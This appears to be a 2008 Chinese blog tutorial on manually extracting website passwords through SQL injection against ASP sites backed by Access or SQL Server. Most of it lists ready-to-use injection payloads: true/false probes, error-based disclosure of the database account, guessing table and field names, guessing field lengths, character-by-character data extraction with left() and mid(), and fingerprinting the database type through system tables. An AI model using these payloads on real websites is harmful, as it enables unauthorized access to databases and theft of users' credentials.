手工SQL注入猜解网站密码
作者:biyuan 来源:biyuan的专栏 发布时间:2008-07-26 12:16:00
判断是否存在SQL注入点
以下为程序代码:
'
and 1=1
and 1=2
' and char(124)%2Buser%2Bchar(124)=0 and '='
and char(124)%2Buser%2Bchar(124)=0
错误判断
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'ID=49' 中。
/showdetail.asp,行8
从这个错误提示我们能看出下面几点:
1. 网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC。
2. 程序没有判断客户端提交的数据是否符合程序要求。
3. 该SQL语句所查询的表中有一名为ID的字段。
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'sonybb' 转换为数据类型为 int 的列时发生语法错误。
/lawjia/show.asp, 第 47 行
但是别有用心的人从这个出错信息中,可以获得以下信息:
该站使用MS_SQL数据库,用ODBC连接,连接帐号名为:sonybb。
SQL数据库表名称猜解
以下为程序代码:
and exists (select * from 表名称)
and 0<>(select count(*) from 表名称)
猜解表里面数据数量
以下为程序代码:
and 数据数量=(select count(*) from 表名称)
猜测表里面的字段名称
以下为程序代码:
and 1=(select count(*) from [表名称] where len(字段名)>0)
and exists (select 字段名 from 表名称)
猜测字段长度
以下为程序代码:
and 1=(select count(*) from [表名称] where len(字段名)<长度)
字段内容猜测
left函数猜测:
以下为程序代码:
and 1=(select count(*) from [表名称] where left(字段名,位数)='所在位数以内的内容')
mid函数猜测:
以下为程序代码:
and 1=(select count(*) from [表名称] where mid(字段名,查询的位数,1)='查询所在位数的数据')
精髓技巧:
以下为程序代码:
;and user>0
是sa登录,提示是将"dbo"转换成int的列发生错误,而不是"sa"。
数据库类型判断:
以下为程序代码:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0
Access和 SQLServer都有自己的系统表,
比如存放数据库中所有对象的表,
Access是在系统表[msysobjects]中,
但在Web环境下读该表会提示"没有权限",
SQLServer是在表[sysobjects]中,在Web环境下可正常读取。
一般使用第一个判断
如果数据库是SQLServer,
那么第一个网址的页面与原页面是大致相同的;
而第二个网址,由于找不到表msysobjects,会提示出错,
就算程序有容错处理,页面也与原页面完全不同。
如果数据库用的是Access,那么情况就有所不同,
第一个网址的页面与原页面完全不同;
第二个网址,则视乎数据库设置是否允许读该系统表,
一般来说是不允许的,所以与原网址也是完全不同。
大多数情况下,用第一个网址就可以得知系统所用的数据库类型,
第二个网址只作为开启IIS错误提示时的验证。
![](https://www.aspxhome.com/images/zang.png)
![](https://www.aspxhome.com/images/jiucuo.png)
猜你喜欢
- 网站寄宿的空间来说,的确会有出现宕机的现象,或者是出现VPS服务器所在的区块因受到DOS攻击而不能访问的现象。作为站长,如果不能及时发现,那
- 内容优是是任何一项SEO活动的关键所在。毕竟,你会不断地增加并升级网站内容和博客,因此,也就是有新的机会调整内容,并改善搜索引擎的整体可视性
- Linux修改用户所属组1、设置某个用户所在组usermod -g 用户组 用户名注:-g|--gid,修改用户的gid,该组一定存在2、把
- 有不少发布商询问各种推介广告的问题,我们今天就常问问题进行一个集中解答,希望对您有所帮助。推介广告是如何付费的?答:推介广告不同于普通的针对
- 1、禁用网络管理器# chkconfig NetworkManager off # service NetworkManager stop2
- 现在的个人站长依靠Google广告,收入明显地比过去两年减少,从而不少站长都转向做英文站,以获得高额收入,对于新朋友来说,做英文站可不像脑中
- 6. 修改 advanced.acl.population 以设定管理者帐号# cd /usr/local/twig-2.7.5/setup
- 备受业界关注的新浪分众合并案最终以失败告终。9月28日,新浪与分众传媒同时宣布,将不再延长去年十二月宣布的新浪与分众传媒合并交易的截止日。此
- 参考文档官方Docker安装文档:https://docs.docker.com/install/linux/docker-ce/cento
- 无疑,Linux和Unix是最强大的命令行操作系统。虽然我们也可以使用这些操作系统的图形用户界面(GUI),不过在涉及到管理系统配置时,命令
- 对于破解站网站,相信很多人都很熟悉,它是一个破解软件下载站。但谁也不曾料到,就这么一个小站在短短的四个月时间里居然能在这个无限宽广的互联网领
- 需要以下设置:1、后台-采集-文档关键词维护 添加关键词及链接2、后台-系统-核心设置 关键字替换(是/否)使用本功能会影响HTML生成速度
- 从事搜索引擎优化的人员都非常清楚,原创性内容对于搜索引擎优化的意义,特别是在08年下半年开始,百度对于网页重复内容的过滤更加严格了,搜索引擎
- 作为一种资源的组织和表达机制,Web已成为Internet最主要的信息传送媒介。因此Web的性能已经成为判断一个网站成功与否的一个重要评估标
- 对于经常使用Linux系统的人员来说,少不了将本地的文件上传到服务器或者从服务器上下载文件到本地,rz / sz命令很方便的帮我们实现了这个
- 本文主要给大家介绍了关于linux尝试登录失败后锁定用户账户的相关内容,分享出来供大家参考学习,下面来一起看看详细的介绍吧。pam_tall
- 两台运营着近4000个区域的 DNS Server 最近特别不正常,经常出现 DNS ID3000、ID9999的警告,并且辅助 DNS S
- 将证书导入网站目录为了让目标网站所对应的目录文件信息全部使用SSL加密传输功能,我们需要将前面申请好的网站证书导入到目标网站所对应的目录中;
- 如何制作高质量的链接?也就是链接的权重问题。链接建设分外部链接和内部链接两个部分,本文将围绕这两个方面对SEO链接进行简单分析,让大家明白,
- 场景公司项目部署在docker中,由于未知原因容器偶尔会停止,需要写一个脚本监控 容器运行状态,如果容器停止了,就再启动该容器shell脚本